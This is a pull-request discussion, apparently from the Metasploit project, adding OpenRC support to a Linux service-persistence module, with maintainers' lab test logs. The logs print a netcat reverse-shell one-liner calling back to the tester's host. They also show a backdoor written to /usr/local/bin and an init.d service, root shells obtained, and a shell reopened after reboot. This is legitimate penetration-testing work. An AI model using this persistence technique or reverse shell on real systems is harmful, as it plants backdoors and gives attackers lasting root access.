Add openrc to exploits/linux/local/service_persistence.rb

[jvoisin]

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Get a session on a system using openrc, like Alpine Linux
• use exploits/linux/local/service_persistence
• Verify the you get a new session
• Reboot the target
• Verify the you get a new session

[jheysel-r7]

Thanks for the enhancement @jvoisin! After making the small adjustment mentioned below running the module with target = openrc returned a session right away and also when the target was rebooted.

Testing

Running the module

msf6 exploit(linux/local/service_persistence) > rexploit
[*] Reloading module...

[+] mkfifo /tmp/etbesqb; nc 172.16.199.1 5545 0</tmp/etbesqb | /bin/sh >/tmp/etbesqb 2>&1; rm /tmp/etbesqb
[*] Started reverse TCP handler on 172.16.199.1:5545
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter. This module works with: .
[*] Writing backdoor to /usr/local/bin/xABAF
[*] Writing service: /etc/init.d/bacMfRj
[*] Writing '/etc/init.d/bacMfRj' (140 bytes) ...
[*] Enabling service
[*] Starting service
[*] Command shell session 4 opened (172.16.199.1:5545 -> 172.16.199.132:45037) at 2024-10-01 14:55:36 -0700

id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Rebooting the target

msf6 payload(cmd/unix/reverse_netcat) > to_handler
[*] Payload Handler Started as Job 4

[*] Started reverse TCP handler on 172.16.199.1:5545
msf6 payload(cmd/unix/reverse_netcat) > [*] 172.16.199.132 - Meterpreter session 3 closed.  Reason: Died

msf6 payload(cmd/unix/reverse_netcat) > [*] Command shell session 5 opened (172.16.199.1:5545 -> 172.16.199.132:46423) at 2024-10-01 15:02:46 -0700

msf6 payload(cmd/unix/reverse_netcat) > sessions -i -1
[*] Starting interaction with 5...

uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux
id
uid=0(root) gid=0(root)

[jvoisin]

Thank you @smcintyre-r7 for fixing the issues <3

[jheysel-r7]

Thanks @jvoisin, works like a charm.

Testing

When running the module for the first time

msf6 exploit(linux/local/service_persistence) > run

[*] Started reverse TCP handler on 172.16.199.1:5757
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter. This module works with: .
[*] Writing '/etc/init.d/soLbpsw' (140 bytes) ...
[*] Command shell session 4 opened (172.16.199.1:5757 -> 172.16.199.132:40923) at 2024-10-02 14:31:49 -0700

id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux

When rebooting the victim machine

msf6 payload(cmd/unix/reverse_netcat) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 payload(cmd/unix/reverse_netcat) > set lport 5757
lport => 5757
msf6 payload(cmd/unix/reverse_netcat) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 172.16.199.1:5757
msf6 payload(cmd/unix/reverse_netcat) > jobs

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  cmd/unix/reverse_netcat            tcp://172.16.199.1:5757

msf6 payload(cmd/unix/reverse_netcat) > [*] 172.16.199.132 - Meterpreter session 3 closed.  Reason: Died
[*] Command shell session 6 opened (172.16.199.1:5757 -> 172.16.199.132:43189) at 2024-10-02 14:33:01 -0700
msf6 payload(cmd/unix/reverse_netcat) > sessions -i -1
[*] Starting interaction with 6...

id
uid=0(root) gid=0(root)
uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux

[jheysel-r7]

Release Notes

This updates exploits/linux/local/service_persistence.rb to work on systems that are running OpenRC. This module will create a service on the box, and mark it for auto-restart.